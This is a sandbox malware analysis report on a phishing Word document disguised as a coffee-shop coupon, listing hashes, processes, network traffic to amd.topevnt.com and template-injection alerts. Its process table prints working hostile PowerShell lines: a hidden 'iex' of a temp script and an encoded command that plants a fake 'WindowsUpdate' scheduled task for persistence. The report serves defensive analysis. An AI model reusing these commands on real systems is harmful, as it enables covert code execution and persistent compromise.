File name: | EspressoBar - Coupon No.3030.zip |
Full analysis: | https://app.any.run/tasks/154c4159-4bf1-4d8b-837d-bcab7d446966 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 13:08:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | E3ADC710D8E544724F2D206A69A0D22A |
SHA1: | E5DB2C83E09747869449F1C03FA454B773611136 |
SHA256: | 102DA1339728FC76897437B9B59CBEFCEE0F0911FC7A7EFD5F321A553660AB7C |
SSDEEP: | 768:pSK6CZjgflLoruqpWIAsgn6swFrz1ZtvtD5fNEuEmzSSQ9XjSfBugvJk5IdPS5BX:RZcflLollLgn9EXpl9ymuSGSfvvJpml |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
Creator: | Windows User |
---|
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | - |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | - |
Lines: | - |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | - |
Words: | - |
Pages: | 1 |
TotalEditTime: | 1 minute |
Template: | rTemplate |
ContentStatus: | - |
ModifyDate: | 2019:03:12 13:03:00Z |
CreateDate: | 2018:11:02 12:06:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | root |
Keywords: | - |
CampaignTags: | - |
ScenarioTags: | - |
LocalizationTags: | - |
FeatureTags: | - |
InternalTags: | - |
ContentTypeId: | 0x010100AA3F7D94069FF64A86F7DFF56D60E3BE |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 2486 |
ZipCompressedSize: | 439 |
ZipCRC: | 0x2f1f8c3a |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2828 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\EspressoBar - Coupon No.3030.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3604 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\EspressoBar - Coupon No.3030.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3712 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 | ||||
2916 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -c GC $env:TEMP\ps.txt | iex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3380 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AbgBvAFAAIAAtAHMAdABhACAALQB3ACAAMQAgAC0AYwAgAEcAQwAgACQAZQBuAHYAOgBUAEUATQBQAFwAdABhAHMAawAuAHQAeAB0ACAAfAAgAGkAZQB4ACIAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkALgBBAGQAZABNAGkAbgB1AHQAZQBzACgAMwAwACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ARAB1AHIAYQB0AGkAbwBuACAAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMwAwACkAIAAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEgAbwB1AHIAcwAgADEAKQA7AFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzAFUAcABkAGEAdABlACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIARABhAGkAbAB5ACAAVwBpAG4AZABvAHcAcwAgAFUAcABkAGEAdABlACAAVABhAHMAawAuACIAIAAtAEYAbwByAGMAZQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA13B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\msoA3FB.tmp | — | |
MD5:— | SHA256:— | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{E0995816-B6EF-4C96-B65C-E02C532FD1AF} | — | |
MD5:— | SHA256:— | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{C68066BC-71F0-4BBE-B62C-594F0B610A98} | — | |
MD5:— | SHA256:— | |||
3712 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRCF30.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B62ECF0D-5979-41C9-A5D9-A08110EF620F}.FSD | binary | |
MD5:5605D3EE4AE25DEAE9AC64ECE809E809 | SHA256:87B6D006B58986163390F101A458F682BE501FC9AE7C7409B5249DFCACA69C4E | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:296FA53B8160B502E47C5CAD85492441 | SHA256:0A04AF49D315A0192E0FB20333F1122CC0EAA8DA08AC1AFA4C906495535ECAD6 | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | |
MD5:935A5A74038A391E2C473DA6229454C7 | SHA256:127AE0267D14A7EAD8DE495BCEFDD03E50856F7B353F87251B2F0A49B93A425A | |||
3604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:3F1E69E13A1216BF8CD0C126680D8F1B | SHA256:141FE04DA9A4D40CB60A8396D01178D1FFCD09485039A55D766EA9953861F7F4 | |||
3380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WFFW8OMY6O690C45LBO7.temp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3604 | WINWORD.EXE | HEAD | 200 | 34.242.101.140:80 | http://amd.topevnt.com/rTemplate.dotm | IE | — | — | suspicious |
3604 | WINWORD.EXE | OPTIONS | 200 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | — | — | suspicious |
976 | svchost.exe | OPTIONS | 200 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | — | — | suspicious |
976 | svchost.exe | PROPFIND | 405 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | html | 317 b | suspicious |
3604 | WINWORD.EXE | HEAD | 200 | 34.242.101.140:80 | http://amd.topevnt.com/rTemplate.dotm | IE | document | 400 Kb | suspicious |
976 | svchost.exe | PROPFIND | 405 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | html | 317 b | suspicious |
976 | svchost.exe | PROPFIND | 405 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | html | 317 b | suspicious |
976 | svchost.exe | PROPFIND | 405 | 34.242.101.140:80 | http://amd.topevnt.com/ | IE | html | 317 b | suspicious |
3604 | WINWORD.EXE | GET | 200 | 34.242.101.140:80 | http://amd.topevnt.com/rTemplate.dotm | IE | document | 400 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
976 | svchost.exe | 34.242.101.140:80 | amd.topevnt.com | Amazon.com, Inc. | IE | suspicious |
3604 | WINWORD.EXE | 34.242.101.140:80 | amd.topevnt.com | Amazon.com, Inc. | IE | suspicious |
Domain | IP | Reputation |
---|---|---|
amd.topevnt.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3604 | WINWORD.EXE | A Network Trojan was detected | AV INFO MS OFFICE template injection part1 |
3604 | WINWORD.EXE | A Network Trojan was detected | AV INFO MS OFFICE template injection part2 |
3604 | WINWORD.EXE | A Network Trojan was detected | AV INFO MS OFFICE template injection part2 |